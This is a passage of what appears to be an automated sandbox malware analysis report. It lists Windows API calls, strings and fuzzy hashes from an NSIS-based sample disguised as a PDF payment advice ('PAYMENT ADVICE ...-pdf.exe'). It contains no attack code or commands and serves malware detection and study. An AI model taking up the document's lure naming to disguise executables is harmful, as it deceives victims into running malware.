                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2087077646.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2087060697.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087092633.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087106563.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_10000000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1148316912-0
                                                                                                                • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1849352358-0
                                                                                                                • Opcode ID: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                                • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                                • Opcode Fuzzy Hash: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                                • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                • wsprintfW.USER32 ref: 00404A1A
                                                                                                                • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                • String ID: %u.%u%s%s
                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                • Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                                • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                                • Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                                • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                                APIs
                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                • String ID: !
                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                                • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4C
                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D
                                                                                                                • RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F90
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: Call
                                                                                                                • API String ID: 3677997916-1824292864
                                                                                                                • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                • Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
                                                                                                                • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                • Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                • API String ID: 2659869361-3081826266
                                                                                                                • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                • Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
                                                                                                                • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                • Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                  • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                  • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                  • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                  • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 3585118688-0
                                                                                                                • Opcode ID: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                                • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                                • Opcode Fuzzy Hash: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                                • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                                • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                • String ID:
                                                                                                                • API String ID: 2102729457-0
                                                                                                                • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                                • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"), ref: 00405AC2
                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                                • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"), ref: 00405B6A
                                                                                                                • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B11
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                • API String ID: 3248276644-3081826266
                                                                                                                • Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                                • Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
                                                                                                                • Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                                • Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                Strings
                                                                                                                • Error launching installer, xrefs: 00405748
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                • String ID: Error launching installer
                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                                • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
                                                                                                                • GlobalFree.KERNEL32(?), ref: 0040382A
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403809
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                • API String ID: 1100898210-3081826266
                                                                                                                • Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                                • Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
                                                                                                                • Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                                • Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe,C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
                                                                                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe,C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
